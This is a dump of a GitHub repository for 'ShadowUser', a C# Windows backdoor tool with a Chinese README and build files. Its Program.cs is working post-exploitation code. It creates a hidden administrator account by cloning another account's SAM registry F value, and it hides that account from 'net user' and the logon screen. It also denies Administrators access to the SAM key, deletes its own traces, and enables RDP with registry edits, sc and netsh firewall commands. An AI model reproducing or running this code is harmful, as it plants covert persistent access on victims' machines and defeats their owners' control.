├── README.md ├── ShadowUser.sln ├── ShadowUser ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── ShadowUser.csproj ├── bin │ └── Release │ │ ├── ShadowUser.exe │ │ └── ShadowUser.pdb └── obj │ ├── Debug │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ └── ShadowUser.csprojAssemblyReference.cache │ ├── Release │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── ShadowUser.csproj.CoreCompileInputs.cache │ ├── ShadowUser.csproj.FileListAbsolute.txt │ ├── ShadowUser.exe │ └── ShadowUser.pdb │ └── x86 │ └── Release │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── ShadowUser.csproj.CoreCompileInputs.cache │ ├── ShadowUser.csproj.FileListAbsolute.txt │ ├── ShadowUser.csprojAssemblyReference.cache │ ├── ShadowUser.exe │ └── ShadowUser.pdb └── imgs └── image-20210127170232740.png /README.md: -------------------------------------------------------------------------------- 1 | ## Introduce 2 | 3 | **ShadowUser.exe** 4 | 5 | ```tex 6 | [!] The default is 10 bits random password, Don't change your password ! 7 | 8 | Usage: ShadowUser.exe 9 | Eg: ShadowUser.exe zhangsan administrator 10 | ``` 11 | 12 | ![image-20210127170232740](./imgs/image-20210127170232740.png) 13 | 14 | 1. 查询RDP状态与端口，关闭状态可开启； 15 | 16 | 2. 注册表导入用户，`net user`无法删除，需要删除注册表相关键值； 17 | 18 | 3. Windows 的登录界面不显示该用户信息。 19 | 20 | ------ 21 | 22 | ## Reference 23 | 24 | - [Windows-User-Clone.ps1](https://github.com/3gstudent/Windows-User-Clone/blob/master/Windows-User-Clone.ps1) 25 | - [权限维持篇-影子用户后门](http://hackergu.com/power-shadowuser/) 26 | - [渗透技巧——Windows系统的帐户隐藏](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%90%E6%88%B7%E9%9A%90%E8%97%8F/) -------------------------------------------------------------------------------- /ShadowUser.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ShadowUser", "ShadowUser\ShadowUser.csproj", "{F93716EA-E26F-480E-A728-E658740CEF09}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x86 = Debug|x86 12 | Release|Any CPU = Release|Any CPU 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {F93716EA-E26F-480E-A728-E658740CEF09}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {F93716EA-E26F-480E-A728-E658740CEF09}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {F93716EA-E26F-480E-A728-E658740CEF09}.Debug|x86.ActiveCfg = Debug|x86 19 | {F93716EA-E26F-480E-A728-E658740CEF09}.Debug|x86.Build.0 = Debug|x86 20 | {F93716EA-E26F-480E-A728-E658740CEF09}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {F93716EA-E26F-480E-A728-E658740CEF09}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {F93716EA-E26F-480E-A728-E658740CEF09}.Release|x86.ActiveCfg = Release|x86 23 | {F93716EA-E26F-480E-A728-E658740CEF09}.Release|x86.Build.0 = Release|x86 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {20797D4D-F18B-4F36-8EE0-6BC08D5CE0CD} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /ShadowUser/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using Microsoft.Win32; 3 | using System.DirectoryServices; 4 | using System.Diagnostics; 5 | using System.Text.RegularExpressions; 6 | using System.Security.AccessControl; 7 | using System.IO; 8 | using System.Text; 9 | 10 | namespace ShadowUser 11 | { 12 | class Program 13 | { 14 | //流程控制写在Main函数,便于调试 15 | static void Main(string[] args) 16 | { 17 | if (args.Length != 2) 18 | { 19 | Console.WriteLine("[!] The default is 10 bits random password, Don't change your password !"); 20 | Console.WriteLine("\nUsage: ShadowUser.exe "); 21 | Console.WriteLine(" Eg: ShadowUser.exe zhangsan administrator"); 22 | } 23 | else 24 | { 25 | string user = args[0]; 26 | string cloneuser = args[1]; 27 | string users = user + "$"; 28 | //10位随机密码 29 | string chars = "!@#$%0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; 30 | Random randrom = new Random((int)DateTime.Now.Ticks); 31 | string password = ""; 32 | for (int i = 0; i < 10; i++) 33 | { 34 | password += chars[randrom.Next(chars.Length)]; 35 | } 36 | //6位随机文本名 37 | string txt = ""; 38 | for (int i = 0; i < 6; i++) 39 | { 40 | txt += chars[randrom.Next(chars.Length)]; 41 | } 42 | string[] usernames = { cloneuser, users }; 43 | //用户添加，管理员权限 44 | try 45 | { 46 | DirectoryEntry AD = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer"); 47 | DirectoryEntry NewUser = AD.Children.Add(users, "user"); 48 | NewUser.Invoke("SetPassword", new object[] { password }); 49 | //NewUser.Invoke("Put", new object[] { "Description", "Test User from .NET" }); 50 | NewUser.CommitChanges(); 51 | DirectoryEntry grp; 52 | 53 | grp = AD.Children.Find("Administrators", "group"); 54 | if (grp != null) { grp.Invoke("Add", new object[] { NewUser.Path.ToString() }); } 55 | //Console.WriteLine("Account Created Successfully"); 56 | } 57 | catch (Exception ex) 58 | { 59 | Console.WriteLine(ex.Message); 60 | //Console.WriteLine($"[-] The random password: {password}"); 61 | Console.WriteLine("[-] Run the program again !"); 62 | Environment.Exit(0); 63 | } 64 | //注册表键值ACL修改(SYSTEM Allow) 65 | RegACLAllow(); 66 | //导出注册表Username 67 | foreach (string username in usernames) 68 | { 69 | try 70 | { 71 | ExportRegNames($@"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\{username}", $@"C:\Windows\Temp\{username}.reg", username, txt); 72 | } 73 | catch (Exception ex) 74 | { 75 | Console.WriteLine(ex.Message); 76 | Console.WriteLine("\nUsage: ShadowUser.exe "); 77 | Console.WriteLine(" Eg: ShadowUser.exe zhangsan administrator"); 78 | //克隆用户不存在，删除创建的隐藏用户 79 | Deluser(users); 80 | Environment.Exit(0); 81 | } 82 | } 83 | //F值替换 84 | Clone($@"C:\Windows\Temp\{txt}.txt"); 85 | //用户删除 86 | Deluser(users); 87 | //导入注册表 User & UsersF 88 | ImportReg($@"C:\Windows\Temp\{users}.reg", $@"C:\Windows\Temp\UsersF.reg"); 89 | //注册表键值ACL修改(Administrators Deny) 90 | RegACLDeny(); 91 | //删除导出的文件 92 | DelFiles(txt, users, cloneuser); 93 | //RDP状态查询与开启端口 94 | RDP(); 95 | Console.WriteLine("[*] ShadowUser Created Successfully"); 96 | Console.WriteLine($"[+] CloneUser: {cloneuser}\n[+] Username: {users}\n[+] Password: {password}"); 97 | } 98 | } 99 | public static void RegACLAllow() 100 | { 101 | //打开注册表项“HKEY_LOCAL_MACHINE\SAM\SAM”,使用 OpenSubKey 方法得到一个能够更改权限的 RegistryKey 类的实例 102 | RegistryKey rk = Registry.LocalMachine.OpenSubKey(@"SAM\SAM", RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.ChangePermissions); 103 | //注册表项的 Windows 访问控制安全性。 104 | RegistrySecurity rs = new RegistrySecurity(); 105 | //一个给“SYSTEM”用户“完全控制权限”的规则 106 | RegistryAccessRule rar = new RegistryAccessRule("SYSTEM", RegistryRights.FullControl, AccessControlType.Allow); 107 | //把规则添加到列表里 108 | rs.AddAccessRule(rar); 109 | //为注册表项设置权限 110 | rk.SetAccessControl(rs); 111 | } 112 | public static void ExportRegNames(string RegKey, string SavePath, string username, string txt) 113 | { 114 | string path = "\"" + SavePath + "\""; 115 | string key = "\"" + RegKey + "\""; 116 | 117 | var proc = new Process(); 118 | try 119 | { 120 | proc.StartInfo.FileName = "regedit.exe"; 121 | proc.StartInfo.UseShellExecute = false; 122 | proc = Process.Start("regedit.exe", "/e " + path + " " + key + ""); 123 | if (proc != null) proc.WaitForExit(); 124 | } 125 | finally 126 | { 127 | if (proc != null) proc.Dispose(); 128 | } 129 | string text = File.ReadAllText($@"C:\Windows\Temp\{username}.reg"); 130 | string pattern = @"(?is)(?<=$)(.*)(?=$)"; 131 | string result = new Regex(pattern).Match($"{text}").Value; 132 | string users = "00000" + result + Environment.NewLine; 133 | File.AppendAllText($@"C:\Windows\Temp\{txt}.txt", users); 134 | } 135 | public static void Clone(string filename) 136 | { 137 | FileStream fs = new FileStream(filename, FileMode.Open, FileAccess.Read, FileShare.None); 138 | try 139 | { 140 | StreamReader reader = new StreamReader(fs, Encoding.Default); 141 | string line1 = reader.ReadLine(); //第一行 142 | //Console.WriteLine(line1); 143 | RegistryKey key = Registry.LocalMachine; 144 | RegistryKey cureg = key.OpenSubKey($@"SAM\SAM\Domains\Account\Users\{line1}", true); 145 | byte[] cuFvalue = (byte[])cureg.GetValue("F"); 146 | //Console.WriteLine(cuFvalue.Length); 147 | string line2 = Convert.ToString(reader.ReadLine()); //第二行 148 | //Console.WriteLine(line2); 149 | reader.Close(); 150 | RegistryKey ureg = key.OpenSubKey($@"SAM\SAM\Domains\Account\Users\{line2}", true); 151 | ureg.SetValue("F", cuFvalue, RegistryValueKind.Binary); 152 | ureg.Close(); 153 | key.Close(); 154 | 155 | ExportRegUsers($@"HKEY_LOCAL_MACHINE\SAM\\SAM\Domains\Account\Users\{line2}", $@"C:\Windows\Temp\UsersF.reg"); 156 | } 157 | finally 158 | { 159 | fs.Close(); 160 | } 161 | } 162 | public static void Deluser(string users) 163 | { 164 | try 165 | { 166 | DirectoryEntry DE = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer"); 167 | DirectoryEntry DelUsers = DE.Children.Find(users, "user"); 168 | DE.Children.Remove(DelUsers); 169 | } 170 | catch (Exception ex) 171 | { 172 | Console.WriteLine(ex.Message); 173 | Environment.Exit(0); 174 | } 175 | } 176 | public static void ExportRegUsers(string RegKey, string SavePath) 177 | { 178 | string path = "\"" + SavePath + "\""; 179 | string key = "\"" + RegKey + "\""; 180 | 181 | var proc = new Process(); 182 | try 183 | { 184 | proc.StartInfo.FileName = "regedit.exe"; 185 | proc.StartInfo.UseShellExecute = false; 186 | proc = Process.Start("regedit.exe", "/e " + path + " " + key + ""); 187 | 188 | if (proc != null) proc.WaitForExit(); 189 | } 190 | finally 191 | { 192 | if (proc != null) proc.Dispose(); 193 | } 194 | } 195 | //导入注册表 196 | public static void ImportReg(string NameReg, string UserReg) 197 | { 198 | string namepath = "\"" + NameReg + "\""; 199 | string userpath = "\"" + UserReg + "\""; 200 | 201 | { 202 | var proc = new Process(); 203 | try 204 | { 205 | proc.StartInfo.FileName = "regedit.exe"; 206 | proc.StartInfo.UseShellExecute = false; 207 | proc = Process.Start("regedit.exe", "/s " + namepath); 208 | proc = Process.Start("regedit.exe", "/s " + userpath); 209 | 210 | if (proc != null) proc.WaitForExit(); 211 | } 212 | finally 213 | { 214 | if (proc != null) proc.Dispose(); 215 | } 216 | } 217 | } 218 | public static void RegACLDeny() 219 | { 220 | RegistryKey rk = Registry.LocalMachine.OpenSubKey(@"SAM\SAM", RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.ChangePermissions); 221 | RegistrySecurity rs = new RegistrySecurity(); 222 | RegistryAccessRule rar = new RegistryAccessRule("Administrators", RegistryRights.FullControl, AccessControlType.Deny); 223 | rs.AddAccessRule(rar); 224 | rk.SetAccessControl(rs); 225 | } 226 | public static void DelFiles(string txt, string users, string cloneuser) 227 | { 228 | string[] files = { users, cloneuser, "UsersF" }; 229 | foreach (string filename in files) 230 | { 231 | File.Delete($@"C:\Windows\Temp\{filename}.reg"); 232 | } 233 | File.Delete($@"C:\Windows\Temp\{txt}.txt"); 234 | } 235 | public static void RDP() 236 | { 237 | RegistryKey key = Registry.LocalMachine; 238 | //REG查询3389状态（0: ON 、1: OFF） 239 | RegistryKey RDPstatus = key.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server"); 240 | string status = RDPstatus.GetValue("fDenyTSConnections").ToString(); 241 | //Console.WriteLine(status); 242 | 243 | RegistryKey RDPport = key.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"); 244 | string port = RDPport.GetValue("PortNumber").ToString(); 245 | RDPport.Close(); 246 | 247 | if (status.Contains("0")) 248 | { 249 | Console.WriteLine("[*] RDP is already enabled"); 250 | Console.WriteLine($"[+] RDP Port: {port}"); 251 | 252 | } 253 | else 254 | { 255 | //参考Metasploit中 post/windows/manage/enable_rdp 模块 256 | Console.WriteLine("[*] RDP is disabled, enabling it ..."); 257 | RegistryKey RDPopen = key.CreateSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server"); 258 | RDPopen.SetValue("fDenyTSConnections", "0", RegistryValueKind.DWord); 259 | RDPopen.Close(); 260 | 261 | { 262 | Process p = new Process(); 263 | //设置要启动的应用程序 264 | p.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; 265 | //是否使用操作系统shell启动 266 | p.StartInfo.UseShellExecute = false; 267 | //接受来自调用程序的输入信息 268 | p.StartInfo.RedirectStandardInput = true; 269 | //输出信息 270 | p.StartInfo.RedirectStandardOutput = true; 271 | //输出错误 272 | p.StartInfo.RedirectStandardError = true; 273 | //不显示程序窗口 274 | p.StartInfo.CreateNoWindow = true; 275 | p.Start(); 276 | p.StandardInput.WriteLine(@"sc config termservice start= auto"); 277 | p.StandardInput.WriteLine(@"netsh firewall set service remotedesktop enable"); 278 | p.StandardInput.WriteLine("exit"); 279 | p.WaitForExit(); 280 | p.Close(); 281 | p.Dispose(); 282 | } 283 | Console.WriteLine($"[+] RDP Port: {port}"); 284 | } 285 | } 286 | } 287 | } -------------------------------------------------------------------------------- /ShadowUser/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // 有关程序集的一般信息由以下 6 | // 控制。更改这些特性值可修改 7 | // 与程序集关联的信息。 8 | [assembly: AssemblyTitle("ShadowUser")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("ShadowUser")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // 将 ComVisible 设置为 false 会使此程序集中的类型 18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型 19 | //请将此类型的 ComVisible 特性设置为 true。 20 | [assembly: ComVisible(false)] 21 | 22 | // 如果此项目向 COM 公开，则下列 GUID 用于类型库的 ID 23 | [assembly: Guid("f93716ea-e26f-480e-a728-e658740cef09")] 24 | 25 | // 程序集的版本信息由下列四个值组成: 26 | // 27 | // 主版本 28 | // 次版本 29 | // 生成号 30 | // 修订号 31 | // 32 | //可以指定所有这些值，也可以使用“生成号”和“修订号”的默认值 33 | //通过使用 "*"，如下所示: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /ShadowUser/ShadowUser.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {F93716EA-E26F-480E-A728-E658740CEF09} 8 | Exe 9 | ShadowUser 10 | ShadowUser 11 | v2.0 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | true 36 | bin\x86\Debug\ 37 | DEBUG;TRACE 38 | full 39 | x86 40 | 7.3 41 | prompt 42 | 43 | 44 | bin\x86\Release\ 45 | TRACE 46 | true 47 | pdbonly 48 | x86 49 | 7.3 50 | prompt 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | -------------------------------------------------------------------------------- /ShadowUser/bin/Release/ShadowUser.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/ShadowUser/674c524567bd6da05ca998cc7e6fe2aa4bd17b79/ShadowUser/bin/Release/ShadowUser.exe -------------------------------------------------------------------------------- /ShadowUser/bin/Release/ShadowUser.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/ShadowUser/674c524567bd6da05ca998cc7e6fe2aa4bd17b79/ShadowUser/bin/Release/ShadowUser.pdb -------------------------------------------------------------------------------- /ShadowUser/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/ShadowUser/674c524567bd6da05ca998cc7e6fe2aa4bd17b79/ShadowUser/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /ShadowUser/obj/Debug/ShadowUser.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/ShadowUser/674c524567bd6da05ca998cc7e6fe2aa4bd17b79/ShadowUser/obj/Debug/ShadowUser.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /ShadowUser/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/ShadowUser/674c524567bd6da05ca998cc7e6fe2aa4bd17b79/ShadowUser/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /ShadowUser/obj/Release/ShadowUser.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | f0067f7a028ec786c1f52d5321344e452c1c1c6a 2 | -------------------------------------------------------------------------------- /ShadowUser/obj/Release/ShadowUser.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | D:\ShadowUser\ShadowUser\bin\Release\ShadowUser.exe 2 | D:\ShadowUser\ShadowUser\bin\Release\ShadowUser.pdb 3 | D:\ShadowUser\ShadowUser\obj\Release\ShadowUser.csprojAssemblyReference.cache 4 | D:\ShadowUser\ShadowUser\obj\Release\ShadowUser.csproj.CoreCompileInputs.cache 5 | D:\ShadowUser\ShadowUser\obj\Release\ShadowUser.exe 6 | D:\ShadowUser\ShadowUser\obj\Release\ShadowUser.pdb 7 | D:\CSharp\ShadowUser\ShadowUser\bin\Release\ShadowUser.exe 8 | D:\CSharp\ShadowUser\ShadowUser\bin\Release\ShadowUser.pdb 9 | D:\CSharp\ShadowUser\ShadowUser\obj\Release\ShadowUser.csproj.CoreCompileInputs.cache 10 | D:\CSharp\ShadowUser\ShadowUser\obj\Release\ShadowUser.exe 11 | D:\CSharp\ShadowUser\ShadowUser\obj\Release\ShadowUser.pdb 12 | -------------------------------------------------------------------------------- /ShadowUser/obj/Release/ShadowUser.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/ShadowUser/674c524567bd6da05ca998cc7e6fe2aa4bd17b79/ShadowUser/obj/Release/ShadowUser.exe -------------------------------------------------------------------------------- /ShadowUser/obj/Release/ShadowUser.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/ShadowUser/674c524567bd6da05ca998cc7e6fe2aa4bd17b79/ShadowUser/obj/Release/ShadowUser.pdb -------------------------------------------------------------------------------- /ShadowUser/obj/x86/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/ShadowUser/674c524567bd6da05ca998cc7e6fe2aa4bd17b79/ShadowUser/obj/x86/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /ShadowUser/obj/x86/Release/ShadowUser.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | f0067f7a028ec786c1f52d5321344e452c1c1c6a 2 | -------------------------------------------------------------------------------- /ShadowUser/obj/x86/Release/ShadowUser.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | D:\CSharp\ShadowUser\ShadowUser\bin\x86\Release\ShadowUser.exe 2 | D:\CSharp\ShadowUser\ShadowUser\bin\x86\Release\ShadowUser.pdb 3 | D:\CSharp\ShadowUser\ShadowUser\obj\x86\Release\ShadowUser.csprojAssemblyReference.cache 4 | D:\CSharp\ShadowUser\ShadowUser\obj\x86\Release\ShadowUser.csproj.CoreCompileInputs.cache 5 | D:\CSharp\ShadowUser\ShadowUser\obj\x86\Release\ShadowUser.exe 6 | D:\CSharp\ShadowUser\ShadowUser\obj\x86\Release\ShadowUser.pdb 7 | -------------------------------------------------------------------------------- /ShadowUser/obj/x86/Release/ShadowUser.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/ShadowUser/674c524567bd6da05ca998cc7e6fe2aa4bd17b79/ShadowUser/obj/x86/Release/ShadowUser.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /ShadowUser/obj/x86/Release/ShadowUser.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/ShadowUser/674c524567bd6da05ca998cc7e6fe2aa4bd17b79/ShadowUser/obj/x86/Release/ShadowUser.exe -------------------------------------------------------------------------------- /ShadowUser/obj/x86/Release/ShadowUser.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/ShadowUser/674c524567bd6da05ca998cc7e6fe2aa4bd17b79/ShadowUser/obj/x86/Release/ShadowUser.pdb -------------------------------------------------------------------------------- /imgs/image-20210127170232740.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/ShadowUser/674c524567bd6da05ca998cc7e6fe2aa4bd17b79/imgs/image-20210127170232740.png --------------------------------------------------------------------------------